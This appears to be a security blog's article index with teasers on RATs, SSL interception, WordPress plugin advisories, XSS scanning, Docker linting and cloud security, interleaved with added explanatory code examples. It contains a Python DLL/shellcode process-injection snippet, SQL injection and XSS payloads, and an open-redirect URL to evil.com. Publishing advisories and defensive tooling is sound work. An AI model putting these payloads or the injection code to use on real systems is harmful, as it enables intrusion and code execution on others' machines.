Context: I wrote this some time ago as an internal memo for marketing and product to help craft value propositions for selling security tools to security teams. I've noticed some confusion around the objectives of security teams and I'd like to share my perspective, hoping to clarify matters. Please note that these are just my opinions, based on my experience as a security persona across various organizations. What is the goal of a security program?| Articles on Cloudberry Engineering
RAT WARS 2.0: Advanced Techniques for Detecting RAT Screen Control. In the landscape of web maliciousness Remote Administration Trojans (RATs) are not a new trend, but their usage is still strong and growing steadily. At its core a RAT is a backdoor used to let an attacker enter the victim's computer unnoticed and control it remotely: for example, most banking trojans nowadays use remote desktop modules to open a VNC/RDP channel that lets an attacker exfiltrate the money from within t...

Beyond Superfish: a Journey on SSL MitM in the Wild. Recently Lenovo hit the news because they got caught installing adware on their laptops, namely Superfish, which, amongst other features, also performs SSL MitM on the infected computer. Unfortunately, Superfish is not the only one that has been caught nullifying end-to-end SSL encryption. Many other software products and services are turning this "feature" into a nightmare: the result is that nowadays SSL Man in the Middle is not an uncommon scenario...

I was contacted by a friend seeking help: he had bought something on a random e-commerce site and after 30 days nothing had been shipped and no one was replying to his emails. He wanted to know if he had been scammed. In the end the item arrived and the e-commerce site proved to be somewhat legit, so the FakeCommerce label might be a bit sensationalistic. Anyhow, the quick investigation I performed was a good OSINT exercise worth sharing.

As stated in this announcement on Full Disclosure, every major old version of WordPress (from 2.5 to 3.3.1) bundled a SWF applet named swfupload.swf which is vulnerable to XSS. The original hole was found by Neal Poole. Together with Ryan I investigated this issue a little, and after performing a quick Google dork he noticed that a few WordPress plugins were bundling the very same vulnerable applet. To spot all the affected plugins I wrote a quick crawler and ran it against the public...

While playing around looking for a way to catch XSS exploitation on a web application honeypot I stumbled on the problem of logging DOM XSS injections performed in the fragment portion of the URL. As specified by the RFCs, browsers are not required to send the fragment to the server, since it is meant only for client-side use. This is a problem in a scenario where a web app honeypot is involved, because we want to log everything that could expose a potential attack.

One thing I noticed working day by day on WPScan's vulnerability database is that the number of WordPress plugin vulnerabilities disclosed is far lower than the actual number of exploitable plugins. A quick trip to the official directory and a little browsing of the SVN repositories will turn up a lot of trivial bugs which might be worth an advisory. I am talking about low-hanging fruit like unsophisticated XSS and basic SQLi.
Snippet time! Two simple functions to inject a DLL or shellcode into running processes (x86). Enjoy:

```python
import sys
from ctypes import *

PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x00000040
DELETE = 0x00010000
READ_CONTROL = 0x00020000
WRITE_DAC = 0x00040000
WRITE_OWNER = 0x00080000
SYNCHRONIZE = 0x00100000
# Low bits are 0xFFF on Windows XP / Server 2003 and earlier,
# 0xFFFF on Vista / Server 2008 and later
PROCESS_ALL_ACCESS = (DELETE | READ_CONTROL | WRITE_DAC | WRITE_OWNER | SYNCHRONIZE | 0xFFF)
VIRTUAL_MEM = (0x1000 | 0x2000)  # MEM_COMMIT | MEM_RESERVE
KERNEL32 = windll.kernel32


def dllinject(dll_path, pid):
    """ Inject ... """
```
After some months of development xsssniper has become more stable and a lot has changed since the initial releases, so it's about time to peek under the hood of the current version: 0.8.x. First and foremost it's important to highlight that the goal of this tool is to test an entire web application automatically with minimum human intervention (maybe xssnuker would be a better name!). With this in mind, the biggest change has been made to the injection engine. In the first versions user intervention...
# Exploit Title: WordPress Mingle Forum plugin <= 1.0.32.1 Multiple Vulnerabilities
# Date: 2012/01/18
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/mingle-forum.1.0.32.1.zip
# Version: 1.0.32.1

You need an authenticated session to exploit the following vulnerabilities.

1) SQL Injection:
POST: admin.php?page=mfgroups&mingleforum_Action=usergroups
delete_usergroups: Delete
dele_usrgrp%5B%5D: 1 [SQLI]
Vulnerable c...

# Exploit Title: WordPress Shortcode Redirect plugin <= 1.0.01 Stored XSS
# Dork: inurl:/wp-content/plugins/shortcode-redirect/
# Date: 2012/01/18
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip
# Version: 1.0.01

Vulnerability
You need permissions to write a post (HTML mode) to exploit the shortcode:
[redirect url='http://wherever.com"[XSS]' sec='500"[XSS]']

# Exploit Title: WordPress uCan Post plugin <= 1.0.09 Stored XSS
# Dork: inurl:/wp-content/plugins/ucan-post/
# Date: 2012/01/18
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip
# Version: 1.0.09

Vulnerability
You need permissions to publish a post from the public interface. The submission form is not well sanitized and will result in stored XSS in admin pages:
Name field is not sanitized and i...

# Exploit Title: WordPress Age Verification plugin <= 0.4 Open Redirect
# Date: 2012/01/10
# Dork: inurl:wp-content/plugins/age-verification/age-verification.php
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip
# Version: 0.4

Via GET:
http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com
The rendered page will provide a link to http://www.e...
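The advisory above is one instance of the general open-redirect pattern: a redirect_to parameter copied into a link (or a Location header) without checking where it points. As an added example (not the plugin's code and not the author's), here is the vulnerable rendering next to a hardened check in Python, including the browser-side normalisation steps that naive "does it start with http://mysite" checks miss: tab/newline removal, backslashes treated as slashes, scheme-relative and user@host forms, and a scheme with no authority. ALLOWED_HOSTS, the function names and the sample inputs are assumptions made for the example.

```python
import html
from urllib.parse import urlsplit

# Hosts this site is willing to send users to (constructed for the example).
ALLOWED_HOSTS = {"example.com", "www.example.com"}

# Leading/trailing C0 controls and space, which browser URL parsers drop.
_C0_AND_SPACE = "".join(chr(i) for i in range(0x21))


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """True only if `target` resolves to the current origin or an allowed host.

    The input is normalised the way a browser normalises a URL before
    resolving it, so the check rejects what the browser would follow:
    tab/CR/LF are removed anywhere, leading/trailing controls are stripped
    and backslashes count as slashes.
    """
    if not isinstance(target, str):
        return False
    cleaned = "".join(ch for ch in target if ch not in "\t\r\n")
    cleaned = cleaned.strip(_C0_AND_SPACE).replace("\\", "/")
    if not cleaned:
        return False
    parts = urlsplit(cleaned)
    if parts.scheme:
        # "http:evil.com" (scheme but no authority) still lands on evil.com in
        # a browser, so an absolute URL must carry an explicit, allowed host.
        if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
            return False
        return parts.hostname in allowed_hosts  # .hostname drops user@ and :port
    if cleaned.startswith("//"):
        # Scheme-relative: "//evil.com" and "///evil.com" both leave the site.
        return parts.hostname in allowed_hosts
    # Anything else must be an absolute path on the current origin.
    return cleaned.startswith("/")


def render_link_vulnerable(redirect_to):
    """The pattern behind the advisory: the parameter goes into href unchecked
    (HTML-escaping stops XSS here, but not the redirect)."""
    return '<a href="%s">Continue</a>' % html.escape(redirect_to, quote=True)


def render_link_fixed(redirect_to, fallback="/"):
    """Hardened form: fall back to a local path when the target is not allowed."""
    target = redirect_to if is_safe_redirect(redirect_to) else fallback
    return '<a href="%s">Continue</a>' % html.escape(target, quote=True)


if __name__ == "__main__":
    for candidate in ["/wp-admin/", "http://www.evil.com", "//evil.com",
                      "/\\evil.com", "http://www.example.com@evil.com"]:
        print("%-40r %s" % (candidate, is_safe_redirect(candidate)))
```

The allowlist compares the parsed hostname, not a string prefix, which is what defeats `http://www.example.com@evil.com` and `http://www.example.com.evil.com`; a safer design still is to never accept a URL at all and redirect only to an identifier looked up server-side.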
# Exploit Title: WordPress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
# Date: 01/06/2012
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
# Version: 1.1

1) Blind SQL Injection in shortcode:
The shortcode parameter 'id' is prone to blind SQLi; you need to be able to write a post/page to exploit this:
[paywithtweet id="1' AND 1=2"]
[paywithtweet id="1' AND 1=1"]

2) Multiple XSS in p...
I wrote a little app called xsssniper to automatically test XSS injection points in target URLs.

$ python xsssniper.py --url 'X' --payload 'Y' --check 'Z'

What it does is scan the target URL for GET parameters, inject an XSS payload (Y) into each of them and parse the response for artefacts of the injection (Z). The simplest example would be to inject <script type="text/javascript">window.alert('lol')</script> and check for <script type="text/javascript">window.alert('lol')</script>; if we ha...
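As an added example (this is not xsssniper's own code), here is the core loop the description above outlines, in Python: enumerate the GET parameters of a URL, substitute the payload into one parameter at a time, and report the parameters whose response contains the check string verbatim. fake_app is a constructed stand-in for a target site (it echoes q unescaped and HTML-escapes page) so the block runs offline; the function names and the sample URL are assumptions.

```python
import html
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Same payload as in the text; the check defaults to the payload itself.
PAYLOAD = "<script type=\"text/javascript\">window.alert('lol')</script>"


def injection_points(url, payload):
    """Yield (parameter_name, injected_url) with `payload` substituted for the
    value of one GET parameter at a time, the other parameters left intact."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    for i, (name, _value) in enumerate(params):
        mutated = list(params)
        mutated[i] = (name, payload)
        yield name, urlunsplit(parts._replace(query=urlencode(mutated)))


def is_reflected(body, check):
    """A hit only when the artefact survives verbatim: an HTML-escaped echo
    (&lt;script&gt;) is not a hit, which keeps false positives down."""
    return check in body


def scan(url, fetch, payload=PAYLOAD, check=None):
    """Return the names of GET parameters that reflect `check` back when
    `payload` is injected. `fetch(url) -> body` is supplied by the caller."""
    check = check if check is not None else payload
    return [name for name, injected in injection_points(url, payload)
            if is_reflected(fetch(injected), check)]


# --- constructed target, not a real site -----------------------------------
def fake_app(url):
    """Stand-in for an HTTP GET: 'q' is echoed unescaped (vulnerable),
    'page' goes through html.escape (safe)."""
    q = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    return "<h1>Results for %s</h1><p>page %s</p>" % (
        q.get("q", ""), html.escape(q.get("page", ""), quote=True))


if __name__ == "__main__":
    print(scan("http://target.example/search?q=test&page=1", fake_app))  # ['q']
```

Substituting one parameter per request, rather than all at once, is what lets the scanner name the injectable parameter; with a real target, fetch would be a function wrapping an HTTP client and the check string would usually be a shorter, unique marker than the whole payload.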
Quick how-to: install Tor and Polipo on OpenBSD 4.8 and route almost all traffic through them by default. For simplicity I've installed from packages. As root:

$ pkg_add tor
$ pkg_add polipo

Next we need to configure Polipo to use Tor, and we can take advantage of the sample config file provided by Tor itself:

$ cd /etc/polipo
$ mv config config.old
$ wget http://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf
$ mv polipo.conf config

The part worth n...

This is a little how-to for installing and running xmonad under X11.app on Snow Leopard. First (if you haven't yet) install the Haskell platform. I use Homebrew as my package manager of choice:

brew install haskell-platform

Next we install xmonad from Cabal:

cabal update
cabal install xmonad

Now that everything is installed correctly we need to tweak our X11.app settings so it plays nicely with xmonad.

Introducing my new little creature, just released into the wild: Pepbot. What is it? It's a disposable temporary email service. Its main goal is to help you dodge spam by providing a valid throwaway mail address you can use instead of your real one, for example when you want to leave a comment on a shady blog, register on a random forum or whatever else. When prompted for a valid mail simply use whatever@pepbot.com, then go to Pepbot and check your mail, or forget about it.

Docker and container security are broad problem spaces and there is a lot of low-hanging fruit one can harvest to mitigate risks. A good starting point is to follow some best practices when writing Dockerfiles. I've compiled a list of common Docker security issues and how to avoid them. For every issue I've also written an Open Policy Agent (OPA) rule, ready to be used to statically analyze your Dockerfiles with conftest. You can't shift further left than this! You can find the .rego rule set...
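The post's rules are written in Rego for conftest; as an added example (not the author's rule set), here is the same idea as a small standalone Python linter, to show what static Dockerfile checks look like when made concrete. It parses a Dockerfile including backslash continuations, then flags an unpinned or latest base image, a missing or root USER, ADD of remote URLs or local archives, sudo and distribution upgrades inside RUN, credential-looking ENV/ARG names, and an exposed SSH port. The rule identifiers, both sample Dockerfiles and the exact set of checks are assumptions: they are common items on such lists, not a statement about which rules the linked .rego set contains.

```python
import re

# ENV/ARG names that look like credentials baked into the image.
SECRET_NAME = re.compile(r"(PASSWORD|PASSWD|SECRET|TOKEN|API_?KEY|PRIVATE_KEY)", re.I)


def parse_dockerfile(text):
    """Return [(INSTRUCTION, argument), ...], joining backslash continuations
    and dropping comments and blank lines."""
    instructions, buf = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            buf += line[:-1].rstrip() + " "
            continue
        keyword, _, arg = (buf + line).partition(" ")
        instructions.append((keyword.upper(), arg.strip()))
        buf = ""
    return instructions


def _image_tag(image):
    """Tag of an image reference, 'digest' if pinned by @sha256, '' if absent."""
    if "@" in image:
        return "digest"
    last = image.rsplit("/", 1)[-1]          # drop registry[:port]/namespace
    return last.split(":", 1)[1] if ":" in last else ""


def check_dockerfile(text):
    """Return [(rule_id, message), ...] for the Dockerfile in `text`."""
    findings = []
    user = "root"                              # Docker's default without USER
    for kw, arg in parse_dockerfile(text):
        if kw == "FROM":
            image = arg.split()[0]             # ignore "AS stage"
            user = "root"                      # each stage starts as root again
            if image != "scratch" and _image_tag(image) in ("", "latest"):
                findings.append(("FROM-unpinned", "base image %s has no fixed tag or digest" % image))
        elif kw == "USER":
            user = arg.split(":", 1)[0]
        elif kw == "ADD":
            if re.search(r"https?://", arg):
                findings.append(("ADD-remote", "ADD downloads a URL with no integrity check; fetch and verify in RUN"))
            else:
                findings.append(("ADD-local", "ADD silently extracts archives; use COPY for local files"))
        elif kw == "RUN":
            if re.search(r"\bsudo\b", arg):
                findings.append(("RUN-sudo", "sudo inside a build is needless and hides a privilege boundary"))
            if re.search(r"apt-get\s+(dist-)?upgrade|yum\s+update\b|apk\s+upgrade", arg):
                findings.append(("RUN-upgrade", "upgrading packages at build time makes the image unreproducible; rebuild from a newer base instead"))
        elif kw in ("ENV", "ARG"):
            names = [t.split("=", 1)[0] for t in arg.split() if "=" in t] or arg.split()[:1]
            for name in names:
                if SECRET_NAME.search(name):
                    findings.append(("%s-secret" % kw, "%s %s looks like a credential baked into the image" % (kw, name)))
        elif kw == "EXPOSE":
            if any(p.split("/")[0] == "22" for p in arg.split()):
                findings.append(("EXPOSE-ssh", "port 22 exposed: an SSH daemon has no place in a container"))
    if user in ("root", "0"):
        findings.append(("USER-root", "no non-root USER: processes run as root inside the container"))
    return findings


# Constructed samples, not taken from any real project.
BAD_DOCKERFILE = r"""
FROM python:latest
ENV API_KEY=abc123
RUN apt-get update && \
    apt-get upgrade -y
ADD https://example.com/app.tar.gz /opt/
RUN sudo pip install flask
EXPOSE 22 8080
CMD ["python", "/opt/app.py"]
"""

GOOD_DOCKERFILE = r"""
FROM python:3.9-slim
ENV APP_ENV=production
RUN apt-get update && apt-get install -y --no-install-recommends curl \
    && rm -rf /var/lib/apt/lists/*
COPY app.py /app/
RUN useradd -r app
USER app
EXPOSE 8080
CMD ["python", "/app/app.py"]
"""

if __name__ == "__main__":
    for rule, message in check_dockerfile(BAD_DOCKERFILE):
        print("%-14s %s" % (rule, message))
    print("good:", check_dockerfile(GOOD_DOCKERFILE))  # []
```

Two details matter for a check like this in practice: the root-user rule must be evaluated per stage (a builder stage may legitimately stay root as long as the final stage drops privileges), and a secret detector keyed on variable names catches only the obvious cases, so it complements rather than replaces keeping credentials out of build args altogether.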
At Spotify, we actively manage more than 800 Google Cloud Platform projects. As such, maintaining a proper security posture at scale has proven to be a challenging task. In an effort to seamlessly audit and strengthen the security stance of our massive cloud infrastructure, we are investing various resources into building our own tools and methodologies.

I've spent a good year working on a security strategy to manage multi-cloud environments; in this article I want to share what I wish we had done in advance to be better prepared.

Using Apps Script to script G Suite / Google Workspace generates Google Cloud Platform (GCP) projects in the background.

Securing containers is a complex task. The problem space is broad, vendors are pushing hard, there are tons of checklists and best practices, and it's hard to prioritize solutions. So if you had to implement a container security strategy, where would you start?

Identity and Access Management (IAM) is an important piece of the cloud puzzle and it's usually a source of headaches from a security point of view. Let's try to give some pointers from a blue team perspective. If you are a security team that has just inherited a bunch of Google Cloud Platform (GCP) accounts, this guide is for you.

A constant source of pain in Google Cloud Platform (GCP), and everywhere else, is the amount of unmaintained resources: idle virtual machines, old buckets, IAM policies, DNS records and so on. They contribute to the attack surface, and the chance of a vulnerability increases with time. Shutting off resources is such a low-hanging fruit from a risk perspective that as a security engineer you should make it a daily habit. After all, the most secure computer is the one that's been turned off!

Public cloud providers share some security responsibility with their customers. This means that as a security practitioner, what you take into account in your threat model is going to differ between cloud and on-premise environments.

Service Accounts in Google Cloud Platform (GCP) are the main vector for getting an account hacked: it's easy to use them wrong and end up with a compromised key and a lot of headaches.

I've built a directory of open source cloud security tools.

In the context of incident response, lateral movement is how attackers penetrate deeper inside a system. Understanding this concept is critical to containing an ongoing breach.

Google Container Registry (GCR) is the Docker container registry offered by Google Cloud Platform (GCP). Under the hood it's an interface on top of Google Cloud Storage (GCS), and it's so thin that access control is entirely delegated to the storage layer.

Securing our Cloud infrastructure is incredibly important. We are now taking another step forward by leveraging open source tools we developed in partnership with Google.